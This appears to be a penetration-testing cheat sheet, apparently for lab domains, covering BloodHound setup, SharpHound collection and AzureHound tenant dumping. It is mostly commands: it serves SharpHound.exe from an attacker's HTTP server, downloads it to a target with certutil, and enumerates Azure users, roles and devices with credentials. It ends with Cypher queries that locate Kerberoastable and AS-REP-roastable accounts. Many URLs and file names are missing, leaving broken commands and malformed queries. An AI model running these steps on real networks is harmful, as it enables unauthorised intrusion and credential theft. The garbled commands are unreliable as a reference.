Skip to content



  • install and run neo4j
  • start bloodhound gui
    sudo apt install -y bloodhound
    bloodhound --no-sandbox


  • source:
    wget -O /opt/windows/SharpHound.ps1
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain INLANEFREIGHT.LOCAL -ZipFileName
# wait, be patient



wget  -O /opt/windows/
unzip /opt/windows/ -d /opt/windows/sharpHound
rm /opt/windows/
mkdir -p /home/kali/workspace/www & cd /home/kali/workspace/www
cp /opt/windows/sharpHound/SharpHound.exe .
python3 -m http.server 80
certutil -urlcache -f SharpHound.exe
wget -O SharpHound.exe
.\SharpHound.exe --CollectionMethods All --Domain oscp.exam --ExcludeDCs
# wait, be patient is a Python based ingestor for BloodHound, based on Impacket.

echo "==========> Windows:bloodHoundPy"
wget -O /opt/windows/
unzip /opt/windows/ -d /opt/windows/
mv bloodHoundPy
rm /opt/windows/
/opt/windows/bloodHoundPy/ -u 'admin' -p 'xxxxxxxxxx' -ns '' -d '' -c all



echo "==========> Windows:AzureHound"
wget -O /opt/windows/
unzip /opt/windows/ -d /opt/windows
rm /opt/windows/
dump all
/opt/windows/azurehound -u "" -p "xxxxxxxxxx" list --tenant "" -o all.json
dump one object type per call
export USER=''
export PASS='xxxxxxxxxxxxxxxx'
export TENA=''
echo $USER
echo $PASS
echo $TENA
/opt/windows/azurehound --help
/opt/windows/azurehound list --help

/opt/windows/azurehound -u $USER -p $PASS list tenants --tenant $TENA -o tenants.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list users --tenant $TENA -o users.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list groups --tenant $TENA -o groups.json -v 1

/opt/windows/azurehound -u $USER -p $PASS list group-owners --tenant $TENA -o group-owners.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list group-members --tenant $TENA -o group-members.json -v 1

/opt/windows/azurehound -u $USER -p $PASS list management-group-descendants --tenant $TENA -o management-group-descendants.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-group-owners --tenant $TENA -o management-group-owners.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-group-role-assignments --tenant $TENA -o management-group-role-assignments.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-group-user-access-admins --tenant $TENA -o management-group-user-access-admins.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-groups --tenant $TENA -o management-groups.json

/opt/windows/azurehound -u $USER -p $PASS list roles --tenant $TENA -o roles.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list role-assignments --tenant $TENA -o role-assignments.json -v 1

/opt/windows/azurehound -u $USER -p $PASS list devices --tenant $TENA -o devices.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list device-owners --tenant $TENA -o device-owners.json -v 1

Analytics Queries

List all Kerberoastable Accounts

MATCH (n:User) WHERE n.hasspn=true RETURN n

Find user that doesn’t require kerberos pre-authentication (aka AS-REP Roasting)

MATCH (u:User {dontreqpreauth: true}) RETURN u

Find servers a user can RDP into.

match p=(g:Group)-[:CanRDP]->(c:Computer) where  g.objectid ENDS WITH '-513'  AND c.operatingsystem CONTAINS 'Server' return p

Find all sessions any user in a specific domain has

MATCH p=(m:Computer)-[r:HasSession]->(n:User {domain: "ZA.TRYHACKME.COM"}) RETURN p

View all groups that contain the word ‘admin’

Match (n:Group) WHERE CONTAINS "ADMIN" return n

View all users that contain the word ‘admin’

Match (n:User) WHERE CONTAINS "ADMIN" return n

View all computers

MATCH (p:Computer) RETURN p;